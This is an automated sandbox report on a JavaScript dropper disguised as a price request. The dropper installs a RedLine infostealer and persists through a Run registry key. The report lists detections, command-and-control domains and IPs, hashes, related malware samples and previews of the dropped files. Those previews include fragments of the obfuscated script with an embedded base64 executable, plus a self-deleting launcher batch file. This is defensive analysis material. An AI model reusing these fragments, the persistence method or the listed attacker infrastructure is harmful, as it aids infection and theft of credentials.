          Signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file
        • conhost.exe (started)
        • timeout.exe (started)
• audio.exe (started)
• audio.exe (started)

Source | Detection | Scanner | Label | Link
Price request N#U00b0DEM23000199.js | 33% | Virustotal | | Browse
Price request N#U00b0DEM23000199.js | 16% | ReversingLabs | Script-JS.Trojan.Cryxos |
Source | Detection | Scanner | Label | Link
C:\Users\user\AppData\Local\Temp\NaE.exe | 100% | Avira | TR/Dropper.Gen |
C:\Users\user\AppData\Local\Temp\IDWYPJ.js | 100% | Avira | JS/Dldr.G8 |
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\wp[1].js | 100% | Avira | JS/Dldr.G8 |
C:\Users\user\AppData\Local\Temp\audio.exe | 100% | Avira | TR/Dropper.Gen |
C:\Users\user\AppData\Local\Temp\NaE.exe | 100% | Joe Sandbox ML | |
C:\Users\user\AppData\Local\Temp\audio.exe | 100% | Joe Sandbox ML | |
C:\Users\user\AppData\Local\Temp\NaE.exe | 75% | ReversingLabs | Win32.Spyware.RedLine |
C:\Users\user\AppData\Local\Temp\NaE.exe | 62% | Virustotal | | Browse
C:\Users\user\AppData\Local\Temp\audio.exe | 75% | ReversingLabs | Win32.Spyware.RedLine |
C:\Users\user\AppData\Local\Temp\audio.exe | 62% | Virustotal | | Browse
                        No Antivirus matches
Source | Detection | Scanner | Label | Link
chonglee575.duckdns.org | 11% | Virustotal | | Browse
postutopia.net | 4% | Virustotal | | Browse
Source | Detection | Scanner | Label | Link
chonglee575.duckdns.org | 100% | Avira URL Cloud | malware |
https://postutopia.net/wp-includes/images/smilies/wp.js&v;= | 0% | Avira URL Cloud | safe |
https://postutopia.net/ | 0% | Avira URL Cloud | safe |
https://postutopia.net/wp-includes/images/smilies/wp.js | 0% | Avira URL Cloud | safe |
https://postutopia.net/c | 0% | Avira URL Cloud | safe |
https://postutopia.net/wp-includes/images/smilies/wp.js7 | 0% | Avira URL Cloud | safe |
https://postutopia.net/wp-includes/images/smilies/wp.jsG | 0% | Avira URL Cloud | safe |
https://postutopia.net/wp-includes/images/smilies/wp.js | 5% | Virustotal | | Browse
https://postutopia.net/ | 4% | Virustotal | | Browse
https://postutopia.net/wp-includes/images/smilies/wp.jsW | 0% | Avira URL Cloud | safe |
chonglee575.duckdns.org | 11% | Virustotal | | Browse
Name | IP | Active | Malicious | Antivirus Detection | Reputation
chongmei33.publicvm.com | 178.73.192.3 | true | false | | high
chonglee575.duckdns.org | 141.101.134.51 | true | true | | unknown
postutopia.net | 51.254.27.105 | true | true | | unknown
Name | Malicious | Antivirus Detection | Reputation
chongmei33.publicvm.com | false | | high
chonglee575.duckdns.org | true | 11%, Virustotal, Browse; Avira URL Cloud: malware | unknown
https://postutopia.net/wp-includes/images/smilies/wp.js | true | 5%, Virustotal, Browse; Avira URL Cloud: safe | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
https://postutopia.net/ | wscript.exe, 00000000.00000003.1398114001.0000015E7F9CB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1401872911.0000015E7F9CD000.00000004.00000020.00020000.00000000.sdmp | true | 4%, Virustotal, Browse; Avira URL Cloud: safe | unknown
https://postutopia.net/c | wscript.exe, 00000000.00000003.1398114001.0000015E7F9CB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1401872911.0000015E7F9CD000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://postutopia.net/wp-includes/images/smilies/wp.js&v;= | wscript.exe, 00000000.00000003.1396927667.0000015E7ECFA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1400779172.0000015E7ED14000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1397064885.0000015E7ED0F000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://postutopia.net/wp-includes/images/smilies/wp.js7 | wscript.exe, 00000000.00000003.1396927667.0000015E7ECFA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1400779172.0000015E7ED14000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1397064885.0000015E7ED0F000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://postutopia.net/wp-includes/images/smilies/wp.jsG | wscript.exe, 00000000.00000003.1396927667.0000015E7ECFA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1400779172.0000015E7ED14000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1397064885.0000015E7ED0F000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://postutopia.net/wp-includes/images/smilies/wp.jsW | wscript.exe, 00000000.00000003.1396927667.0000015E7ECFA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1400779172.0000015E7ED14000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1397064885.0000015E7ED0F000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | NaE.exe, 00000004.00000002.1460450489.0000000002653000.00000004.00000800.00020000.00000000.sdmp | false | | high
IP | Domain | Country | ASN | ASN Name | Malicious
178.73.192.3 | chongmei33.publicvm.com | Sweden | 42708 | PORTLANEwwwportlanecomSE | false
51.254.27.105 | postutopia.net | France | 16276 | OVHFR | true
141.101.134.51 | chonglee575.duckdns.org | Netherlands | 201011 | NETZBETRIEB-GMBHDE | true
                              Joe Sandbox version:40.0.0 Tourmaline
                              Analysis ID:1430766
                              Start date and time:2024-04-24 06:59:41 +02:00
                              Joe Sandbox product:CloudBasic
                              Overall analysis duration:0h 8m 14s
                              Hypervisor based Inspection enabled:false
                              Report type:full
                              Cookbook file name:default.jbs
                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:16
                              Number of new started drivers analysed:0
                              Number of existing processes analysed:0
                              Number of existing drivers analysed:0
                              Number of injected processes analysed:0
                              Technologies:
                              • HCA enabled
                              • EGA enabled
                              • GSI enabled (Javascript)
                              • AMSI enabled
                              Analysis Mode:default
                              Analysis stop reason:Timeout
                              Sample name:Price request N#U00b0DEM23000199.js
                              renamed because original name is a hash value
                              Original Sample Name:Price request NDEM23000199.js
                              Detection:MAL
                              Classification:mal100.troj.evad.winJS@15/8@4/3
                              EGA Information:
                              • Successful, ratio: 100%
                              HCA Information:
                              • Successful, ratio: 61%
                              • Number of executed functions: 37
                              • Number of non-executed functions: 28
                              Cookbook Comments:
                              • Found application associated with file extension: .js
                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, fe3cr.delivery.mp.microsoft.com
                              • HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• Not all processes were analyzed; the report is missing behavior information
                              • Report size exceeded maximum capacity and may have missing behavior information.
                              • Report size getting too big, too many NtOpenKeyEx calls found.
                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                              • Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description
07:00:41 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run audio "C:\Users\user\AppData\Local\Temp\audio.exe"
07:00:49 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run audio "C:\Users\user\AppData\Local\Temp\audio.exe"
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
51.254.27.105 | test.html | Get hash | malicious | HTMLPhisher | Browse |
141.101.134.51 | ORDER_202344..js | Get hash | malicious | AsyncRAT | Browse |
141.101.134.51 | cxI8z2rY3C.exe | Get hash | malicious | AsyncRAT | Browse |
141.101.134.51 | ORDER-230316.xlsm | Get hash | malicious | AsyncRAT | Browse |
141.101.134.51 | rIXVC7CIsu.exe | Get hash | malicious | AsyncRAT | Browse |
141.101.134.51 | ORDER-230409.doc.exe | Get hash | malicious | AsyncRAT | Browse |
141.101.134.51 | aGcp1Zk6yu.exe | Get hash | malicious | AsyncRAT | Browse |
141.101.134.51 | SecuriteInfo.com.Heur.MSIL.Androm.1.13901.exe | Get hash | malicious | AsyncRAT | Browse |
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
chongmei33.publicvm.com | ORDER-2436788-EQU.js | Get hash | malicious | WSHRat | Browse | 46.246.14.4
chongmei33.publicvm.com | PO-2301219.pdf.js | Get hash | malicious | WSHRat | Browse | 103.47.144.118
chongmei33.publicvm.com | SA___CS_Purchase_Order.xls.js | Get hash | malicious | WSHRat | Browse | 103.47.144.44
chongmei33.publicvm.com | ORDER-23118FC.pdf.js | Get hash | malicious | WSHRat | Browse | 103.47.144.63
chongmei33.publicvm.com | Ref-231017AF-Payment-Details.js | Get hash | malicious | AgentTesla, WSHRAT | Browse | 103.47.144.71
chongmei33.publicvm.com | Payment_Copy.docx.vbs | Get hash | malicious | AgentTesla, WSHRAT | Browse | 104.243.242.103
chongmei33.publicvm.com | Payment_Copy.pdf.js | Get hash | malicious | WSHRAT | Browse | 104.243.242.12
chongmei33.publicvm.com | Cash_Transfer_REF#23284449-9374647.js | Get hash | malicious | WSHRat, XWorm | Browse | 103.47.144.93
chongmei33.publicvm.com | Ref-23105_Payment_Slip.pdf.js | Get hash | malicious | WSHRAT | Browse | 103.47.144.64
chongmei33.publicvm.com | Purchase_Order.pdf.js | Get hash | malicious | WSHRat | Browse | 172.111.147.88
chonglee575.duckdns.org | ORDER_202344..js | Get hash | malicious | AsyncRAT | Browse | 141.101.134.51
chonglee575.duckdns.org | cxI8z2rY3C.exe | Get hash | malicious | AsyncRAT | Browse | 141.101.134.51
chonglee575.duckdns.org | ORDER-230316.xlsm | Get hash | malicious | AsyncRAT | Browse | 141.101.134.51
chonglee575.duckdns.org | rIXVC7CIsu.exe | Get hash | malicious | AsyncRAT | Browse | 141.101.134.51
chonglee575.duckdns.org | ORDER-230409.doc.exe | Get hash | malicious | AsyncRAT | Browse | 141.101.134.51
chonglee575.duckdns.org | aGcp1Zk6yu.exe | Get hash | malicious | AsyncRAT | Browse | 141.101.134.51
chonglee575.duckdns.org | SecuriteInfo.com.Heur.MSIL.Androm.1.13901.exe | Get hash | malicious | AsyncRAT | Browse | 141.101.134.51
chonglee575.duckdns.org | dGSQxmfNFwvn.exe | Get hash | malicious | AsyncRAT | Browse | 141.101.134.37
chonglee575.duckdns.org | WvHz3PEgTl.exe | Get hash | malicious | AsyncRAT | Browse | 46.183.220.49
chonglee575.duckdns.org | MACHINE SPCIFICATIONS.exe | Get hash | malicious | AsyncRAT | Browse | 46.183.220.49
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
PORTLANEwwwportlanecomSE | xjXIE2ZFFSw4.exe | Get hash | malicious | AsyncRAT, DcRat | Browse | 46.246.14.10
PORTLANEwwwportlanecomSE | xjXIE2ZFFSw4.exe | Get hash | malicious | AsyncRAT, DcRat | Browse | 46.246.14.10
PORTLANEwwwportlanecomSE | BitTorrent-7.6.exe | Get hash | malicious | Unknown | Browse | 188.126.94.80
PORTLANEwwwportlanecomSE | xVcsGL5R1Nbh.exe | Get hash | malicious | Njrat | Browse | 46.246.6.20
PORTLANEwwwportlanecomSE | xyyDAUDPeYEH.exe | Get hash | malicious | Njrat | Browse | 46.246.6.20
PORTLANEwwwportlanecomSE | xzcQo6GenFVf.exe | Get hash | malicious | AsyncRAT, DcRat | Browse | 46.246.14.5
PORTLANEwwwportlanecomSE | tajma.x86-20240422-0535.elf | Get hash | malicious | Mirai, Okiru | Browse | 188.126.69.245
PORTLANEwwwportlanecomSE | x7RZVIWaDKb5.exe | Get hash | malicious | Njrat | Browse | 46.246.14.17
PORTLANEwwwportlanecomSE | x7RZVIWaDKb5.exe | Get hash | malicious | Njrat | Browse | 46.246.14.17
PORTLANEwwwportlanecomSE | bUBL.exe | Get hash | malicious | Njrat | Browse | 46.246.14.17
OVHFR | SecuriteInfo.com.Python.Stealer.1437.14994.32063.exe | Get hash | malicious | Python Stealer | Browse | 151.80.29.83
OVHFR | SecuriteInfo.com.Win64.TrojanX-gen.22735.27744.exe | Get hash | malicious | Xmrig | Browse | 54.37.232.103
OVHFR | _file____C__Users_hp_Downloads_C__Users_moodyt_AppData_Local_Temp_2_RemittanceAdvice17-Apr-2024.html | Get hash | malicious | Unknown | Browse | 51.222.241.106
OVHFR | Remittance. #U0440df.html | Get hash | malicious | HTMLPhisher | Browse | 51.222.241.100
OVHFR | TeaiGames.exe | Get hash | malicious | NovaSentinel | Browse | 51.178.66.33
OVHFR | https://www.sushi-idea.com/ | Get hash | malicious | Unknown | Browse | 51.83.143.92
OVHFR | SecuriteInfo.com.Trojan.InstallCore.4086.15026.2213.exe | Get hash | malicious | PrivateLoader, PureLog Stealer | Browse | 137.74.204.214
OVHFR | BitTorrent-7.6.exe | Get hash | malicious | Unknown | Browse | 94.23.249.222
OVHFR | BitTorrent-7.6.exe | Get hash | malicious | Unknown | Browse | 51.75.78.69
OVHFR | m2 Cotizaci#U00f3n-1634.pdf.exe | Get hash | malicious | FormBook | Browse | 94.23.112.190
NETZBETRIEB-GMBHDE | http://tr138649325.recuperacionesbancarias.com | Get hash | malicious | Unknown | Browse | 185.103.10.2
NETZBETRIEB-GMBHDE | d4dtHo2bNn.elf | Get hash | malicious | Mirai | Browse | 93.159.212.222
NETZBETRIEB-GMBHDE | lRgFFON2H0.elf | Get hash | malicious | Mirai | Browse | 188.72.83.184
NETZBETRIEB-GMBHDE | https://tr195371688.sabinayeasmin.info/c/8v9pl/i8fnl9ti/s2molj4edre | Get hash | malicious | HTMLPhisher | Browse | 185.103.10.3
NETZBETRIEB-GMBHDE | http://freeganpulriefreezre.tk | Get hash | malicious | Unknown | Browse | 46.243.143.249
NETZBETRIEB-GMBHDE | ORDER_202344..js | Get hash | malicious | AsyncRAT | Browse | 141.101.134.51
NETZBETRIEB-GMBHDE | cxI8z2rY3C.exe | Get hash | malicious | AsyncRAT | Browse | 141.101.134.51
NETZBETRIEB-GMBHDE | ORDER-230316.xlsm | Get hash | malicious | AsyncRAT | Browse | 141.101.134.51
NETZBETRIEB-GMBHDE | rIXVC7CIsu.exe | Get hash | malicious | AsyncRAT | Browse | 141.101.134.51
NETZBETRIEB-GMBHDE | ORDER-230409.doc.exe | Get hash | malicious | AsyncRAT | Browse | 141.101.134.51
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
37f463bf4616ecd445d4a1937da06e19 | orden de compra.vbs | Get hash | malicious | AgentTesla | Browse | 51.254.27.105
37f463bf4616ecd445d4a1937da06e19 | FT. 40FE CNY .xlsx.lnk | Get hash | malicious | AgentTesla, DBatLoader, PureLog Stealer, RedLine | Browse | 51.254.27.105
37f463bf4616ecd445d4a1937da06e19 | DHL Shipping doc.vbs | Get hash | malicious | AgentTesla, GuLoader | Browse | 51.254.27.105
37f463bf4616ecd445d4a1937da06e19 | G4-TODOS.vbs | Get hash | malicious | AgentTesla, GuLoader | Browse | 51.254.27.105
37f463bf4616ecd445d4a1937da06e19 | Reconfirm Details.vbs | Get hash | malicious | AgentTesla | Browse | 51.254.27.105
37f463bf4616ecd445d4a1937da06e19 | #U56de#U590d BULK ORDER PO#GDN-JL-OO-231227.xlsx.lnk | Get hash | malicious | Unknown | Browse | 51.254.27.105
37f463bf4616ecd445d4a1937da06e19 | 181_960.msi | Get hash | malicious | Unknown | Browse | 51.254.27.105
37f463bf4616ecd445d4a1937da06e19 | UXNob1Dp32.exe | Get hash | malicious | Babuk, Clipboard Hijacker, Djvu, Vidar | Browse | 51.254.27.105
37f463bf4616ecd445d4a1937da06e19 | 3CB27VUHRg.exe | Get hash | malicious | Babuk, Djvu | Browse | 51.254.27.105
37f463bf4616ecd445d4a1937da06e19 | mJVVW85CnW.exe | Get hash | malicious | Babuk, Clipboard Hijacker, Djvu, Vidar | Browse | 51.254.27.105
                                              No context
                                              Process:C:\Users\user\AppData\Local\Temp\NaE.exe
                                              File Type:ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):617
                                              Entropy (8bit):5.3554278163807965
                                              Encrypted:false
                                              SSDEEP:12:Q3La/hhkvoDLI4MWuCqDLI4MWuPTAOKbbDLI4MWuPJKAVKhat92n4M6:MLUE4K5E4KlKDE4KhKiKhg84j
                                              MD5:A238CE7696BC8B1D003EB7CEDDF15C97
                                              SHA1:CE312D2E534C686B1E02EB6117AE7C256698261D
                                              SHA-256:963FDD80F0BB46D58ED4C41B106B07A433A87EC0B20C7BB7C6BD830F37208328
                                              SHA-512:2546E782C8C8C078923C5F17E63F241C59FA2B6A4E6A4C892E38381CF596063092257A040F58B25823E6A6B2BE3061EBC7754586938CF87CD498269DFD68A097
                                              Malicious:false
                                              Reputation:low
                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..
                                              Process:C:\Users\user\AppData\Local\Temp\audio.exe
                                              File Type:ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):520
                                              Entropy (8bit):5.355496254154943
                                              Encrypted:false
                                              SSDEEP:12:Q3La/hhkvoDLI4MWuCqDLI4MWuPTAOKbbDLI4MWuPJKAVKhav:MLUE4K5E4KlKDE4KhKiKhk
                                              MD5:3C255C75EA6EB42410894C0D08A4E324
                                              SHA1:34B3512313867B269C545241CD502B960213293A
                                              SHA-256:116B1D2FF17BE7FE8C4B6D935688F81C40716AFCD995C76BFC2D1AB2AFA774A7
                                              SHA-512:41406D84C3FC3D5EFAD22277382D9ADC444D00FDE95C1B7B6BC17E80452CA5DE084D28D892BC0C6890FE64DC733790E26D0F62FE3477175DCCCAC777FDE5E7EC
                                              Malicious:false
                                              Reputation:moderate, very likely benign file
                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..
                                              Process:C:\Windows\System32\wscript.exe
                                              File Type:ASCII text, with very long lines (65164), with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):305955
                                              Entropy (8bit):5.79663316602609
                                              Encrypted:false
                                              SSDEEP:6144:UaP0cFRNUIo3Ip9Sb11SbTAb1++tsnXkZUe/xOrQ0dESZy:zPdbNUIo3lb11SfAb1++tsnXO+Q0dLZy
                                              MD5:543BA48603F0ACCD9C3AE7A76E6A53C8
                                              SHA1:1BD9FB9375EC9DB0900F7EB09781AE6B57D33FFE
                                              SHA-256:BB31D8123C3B351AF8B7A851A9187E9E93394ACDA05B8DF5DC90BEB6939BAA78
                                              SHA-512:A446DE01D532DBEE3D8AC8625DB093CB5BE15E02FA68BD366F7E365E436D782B5F66C7762986B0A6B8D78812B34B852C272BD03ED56D6F603DF6EC3873C9D24F
                                              Malicious:true
                                              Antivirus:
                                              • Antivirus: Avira, Detection: 100%
                                              Reputation:low
                                              Preview:xLplQOnpEnZAdTl = "" ..SOuwzAeyuFjYc = 191;..var iiEDHtGOFFexgJcFM = "OhYskmbOPLqjWNIwewPfOZS";..PBNJQyTrBsirBzjyw = 16;..var dpriQfirVBBMNaxoPJqXdKPwUoqoVGwvyTBZhkzWeRvxReoRlCmqsbSSZuNbouVPEGO = "uZXHfJUsMPSfqAZCTUFCXAizmWXikvgsKQtsNvHgYjGDHPXbOrCuzEqtqYUImlHQjZVaGhpYNZeotfsXzvTttltGZABpayumbqThtxVhBehZZCzLfxJqSNWxgPAGfAxOfrMDLLdBalsPETgWAqJdpDUOTVAewPCBgSuiqwzUTHQ";..xLplQOnpEnZAdTl = xLplQOnpEnZAdTl + "
                                              Process:C:\Windows\System32\wscript.exe
                                              File Type:ASCII text, with very long lines (65164), with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):305955
                                              Entropy (8bit):5.79663316602609
                                              Encrypted:false
                                              SSDEEP:6144:UaP0cFRNUIo3Ip9Sb11SbTAb1++tsnXkZUe/xOrQ0dESZy:zPdbNUIo3lb11SfAb1++tsnXO+Q0dLZy
                                              MD5:543BA48603F0ACCD9C3AE7A76E6A53C8
                                              SHA1:1BD9FB9375EC9DB0900F7EB09781AE6B57D33FFE
                                              SHA-256:BB31D8123C3B351AF8B7A851A9187E9E93394ACDA05B8DF5DC90BEB6939BAA78
                                              SHA-512:A446DE01D532DBEE3D8AC8625DB093CB5BE15E02FA68BD366F7E365E436D782B5F66C7762986B0A6B8D78812B34B852C272BD03ED56D6F603DF6EC3873C9D24F
                                              Malicious:true
                                              Antivirus:
                                              • Antivirus: Avira, Detection: 100%
                                              Reputation:low
                                              Preview:xLplQOnpEnZAdTl = "" ..SOuwzAeyuFjYc = 191;..var iiEDHtGOFFexgJcFM = "OhYskmbOPLqjWNIwewPfOZS";..PBNJQyTrBsirBzjyw = 16;..var dpriQfirVBBMNaxoPJqXdKPwUoqoVGwvyTBZhkzWeRvxReoRlCmqsbSSZuNbouVPEGO = "uZXHfJUsMPSfqAZCTUFCXAizmWXikvgsKQtsNvHgYjGDHPXbOrCuzEqtqYUImlHQjZVaGhpYNZeotfsXzvTttltGZABpayumbqThtxVhBehZZCzLfxJqSNWxgPAGfAxOfrMDLLdBalsPETgWAqJdpDUOTVAewPCBgSuiqwzUTHQ";..xLplQOnpEnZAdTl = xLplQOnpEnZAdTl + "TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA4AAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABoEIQtLHHqfixx6n4scep+MiN/fj9x6n4Lt5F+K3Hqfixx635ccep+MiNufhxx6n4yI2l+onHqfjIje34tcep+UmljaCxx6n4AAAAAAAAAAAAAAAAAAAAAI5C3XgAAAABQRQAATAEEAHSlAFAAAAAAAAAAAOAAIwELAQkAAJgBAACiAQAAAAAAL80AAAAQAAAAsAEAAABAAAAQAAAAAgAABQAAAAAAAAAFAAAAAAAAAACAAwAABAAA+zsCAAIAAIAAABAAABAAAAAAEAAAEAAAAAAAABAAAAAAAAAAAAAAALQVAgBQAAAAAGACAAAdAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADAsQEAHAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAKANAgBAAAAAAAAAAAAAAAAAsAE
                                              Process:C:\Windows\System32\wscript.exe
                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                              Category:dropped
                                              Size (bytes):212480
                                              Entropy (8bit):7.334840894349961
                                              Encrypted:false
                                              SSDEEP:3072:TDKW1LgppLRHMY0TBfJvjcTp5Xint9AyPAObCts4CfbQVQwSQwn1cxj:TDKW1Lgbdl0TBBvjc/iXdoNtYfUbSp8j
                                              MD5:E05EDADFDDE523064F35BA05A09B55D5
                                              SHA1:48FB08A5186F47B3084585ADE19513DC2B3BA4D8
                                              SHA-256:4C85F51EA7859BB085B597C10A1AFF5E6B994EF8CB071E0571C939EE5BE89F8B
                                              SHA-512:AA6F42BF72D6B80052B813DB695FA98B93931187478B784474BAFD01CD10DF131FFD39FBE1E9D9EDE81B81FCEA1A3BA68E9C694FE12D86941859D5FBD1C0C73C
                                              Malicious:true
                                              Yara Hits:
                                              • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: C:\Users\user\AppData\Local\Temp\NaE.exe, Author: Joe Security
                                              • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: C:\Users\user\AppData\Local\Temp\NaE.exe, Author: ditekSHen
                                              Antivirus:
                                              • Antivirus: Avira, Detection: 100%
                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                              • Antivirus: ReversingLabs, Detection: 75%
                                              • Antivirus: Virustotal, Detection: 62%
                                              Reputation:low
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......h..-,q.~,q.~,q.~2#.~?q.~...~+q.~,q.~\q.~2#n~.q.~2#i~.q.~2#{~-q.~Rich,q.~................#..^....PE..L...t..P..........#................./.............@..................................;..........................................P....`..................................................................@............................................text............................... ..`.rdata...m.......n..................@..@.data....0... ......................@....rsrc........`....... ..............@..@................................................................................................................................................................................................................................................................................................................................................................................
                                              Process:C:\Users\user\AppData\Local\Temp\NaE.exe
                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                              Category:dropped
                                              Size (bytes):212480
                                              Entropy (8bit):7.334840894349961
                                              Encrypted:false
                                              SSDEEP:3072:TDKW1LgppLRHMY0TBfJvjcTp5Xint9AyPAObCts4CfbQVQwSQwn1cxj:TDKW1Lgbdl0TBBvjc/iXdoNtYfUbSp8j
                                              MD5:E05EDADFDDE523064F35BA05A09B55D5
                                              SHA1:48FB08A5186F47B3084585ADE19513DC2B3BA4D8
                                              SHA-256:4C85F51EA7859BB085B597C10A1AFF5E6B994EF8CB071E0571C939EE5BE89F8B
                                              SHA-512:AA6F42BF72D6B80052B813DB695FA98B93931187478B784474BAFD01CD10DF131FFD39FBE1E9D9EDE81B81FCEA1A3BA68E9C694FE12D86941859D5FBD1C0C73C
                                              Malicious:true
                                              Yara Hits:
                                              • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: C:\Users\user\AppData\Local\Temp\audio.exe, Author: Joe Security
                                              • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: C:\Users\user\AppData\Local\Temp\audio.exe, Author: ditekSHen
                                              Antivirus:
                                              • Antivirus: Avira, Detection: 100%
                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                              • Antivirus: ReversingLabs, Detection: 75%
                                              • Antivirus: Virustotal, Detection: 62%
                                              Reputation:low
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......h..-,q.~,q.~,q.~2#.~?q.~...~+q.~,q.~\q.~2#n~.q.~2#i~.q.~2#{~-q.~Rich,q.~................#..^....PE..L...t..P..........#................./.............@..................................;..........................................P....`..................................................................@............................................text............................... ..`.rdata...m.......n..................@..@.data....0... ......................@....rsrc........`....... ..............@..@................................................................................................................................................................................................................................................................................................................................................................................
                                              Process:C:\Users\user\AppData\Local\Temp\NaE.exe
                                              File Type:DOS batch file, ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):154
                                              Entropy (8bit):4.999772768834574
                                              Encrypted:false
                                              SSDEEP:3:mKDDCMNqTtvL5oCHyg4E2J5xAIt6KJymqRDCHyg4E2J5xAInTRIOmLRIVL1ZPy:hWKqTtT6CHhJ23fthJymq1CHhJ23fTva
                                              MD5:5AA2EA6EAAC4DAD8BB00646E66EA9B86
                                              SHA1:A5CAD671FDD739C34582507157C316806AB2C793
                                              SHA-256:9FAF742A2870DC9039CC0CEA9CD778EED11D0DB0A0924EF112458D2A0329DCD7
                                              SHA-512:52A8105166E637464A86D5B21FD3A987BE98D83ACFAAF61C3470168B840F24BD9EB5C49E2BE4B67D2B25E6353A84C92AA5C382C969454FF888AAB825834E9077
                                              Malicious:false
                                              Preview:@echo off..timeout 3 > NUL..START "" "C:\Users\user\AppData\Local\Temp\audio.exe"..CD C:\Users\user\AppData\Local\Temp\..DEL "tmpAB92.tmp.bat" /f /q..
                                              Process:C:\Windows\SysWOW64\timeout.exe
                                              File Type:ASCII text, with CRLF line terminators, with overstriking
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.41440934524794
                                              Encrypted:false
                                              SSDEEP:3:hYFqdLGAR+mQRKVxLZXt0sn:hYFqGaNZKsn
                                              MD5:3DD7DD37C304E70A7316FE43B69F421F
                                              SHA1:A3754CFC33E9CA729444A95E95BCB53384CB51E4
                                              SHA-256:4FA27CE1D904EA973430ADC99062DCF4BAB386A19AB0F8D9A4185FA99067F3AA
                                              SHA-512:713533E973CF0FD359AC7DB22B1399392C86D9FD1E715248F5724AAFBBF0EEB5EAC0289A0E892167EB559BE976C2AD0A0A0D8EFC407FFAF5B3C3A32AA9A0AAA4
                                              Malicious:false
                                              Preview:..Waiting for 3 seconds, press a key to continue ....2.1.0..
                                              File type:ASCII text, with very long lines (8195), with CRLF line terminators
                                              Entropy (8bit):3.6292123257048012
                                              TrID:
                                                File name:Price request N#U00b0DEM23000199.js
                                                File size:8'229 bytes
                                                MD5:58cd571807ec7624c3f5865fade24891
